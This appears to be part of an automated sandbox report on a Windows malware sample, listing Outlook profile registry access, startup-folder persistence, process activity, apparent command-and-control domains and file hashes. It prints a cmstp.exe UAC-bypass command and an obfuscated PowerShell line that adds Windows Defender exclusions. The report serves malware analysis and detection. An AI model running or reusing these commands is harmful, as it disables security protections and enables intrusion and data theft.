| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe
"C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"
\??\c:\windows\system32\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Users\Admin\A.inf
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -exec bypass [char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]80+[char]97+[char]116+[char]104+[char]32+[char]39+[char]67+[char]58+[char]92+[char]39+[char]59+[char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]69+[char]120+[char]116+[char]101+[char]110+[char]115+[char]105+[char]111+[char]110+[char]32+[char]39+[char]101+[char]120+[char]101+[char]39| .((gV '*mdr*').NAMe[3,11,2]-joIn'')
C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | poolfreshstep.com | udp |
| RU | 185.170.144.39:80 | poolfreshstep.com | tcp |
| US | 8.8.8.8:53 | 39.144.170.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fallback-01-static.com | udp |
| MY | 111.90.145.132:7708 | fallback-01-static.com | tcp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.145.90.111.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| MY | 111.90.145.132:7708 | fallback-01-static.com | tcp |
| US | 8.8.8.8:53 | poolfreshstep.com | udp |
Files
C:\Users\Admin\A.inf
| MD5 | 961df7710c27cd2a2452c11aa48ada24 |
| SHA1 | 081694e0067918b8355efef2cf72ef52d82e44b0 |
| SHA256 | d3a48635568ef5d4c0a1c86b3f750f06362056807d39b9461cd053ca88ee7a41 |
| SHA512 | 64f9e3950c01f000e70166c5cb783a0be77249f2c06c99e23a9ab05c6a3a92f18de2478592db3b3dd328c8e5af6abcdcf07c74b63c373b7a24bc336a80503aae |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uajcztiv.2ns.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe
| MD5 | d00a8f6a66f5fcaf18564b6f47831294 |
| SHA1 | d1ae07fd6267b53264f1764cc45aafbfe9f5f763 |
| SHA256 | a60e55b8c66eb98a300d09fbdbe932bdf53476b805f10be02e6a7f2acdee8039 |
| SHA512 | 99937a6e5aeb1248c8c341e43a0747eb98f06f972b559690afa810787173b2eb00ac2b657fd6c82a25630b1a47ab343bbf0b4e7ee250c54e59c95fa7f6f94c27 |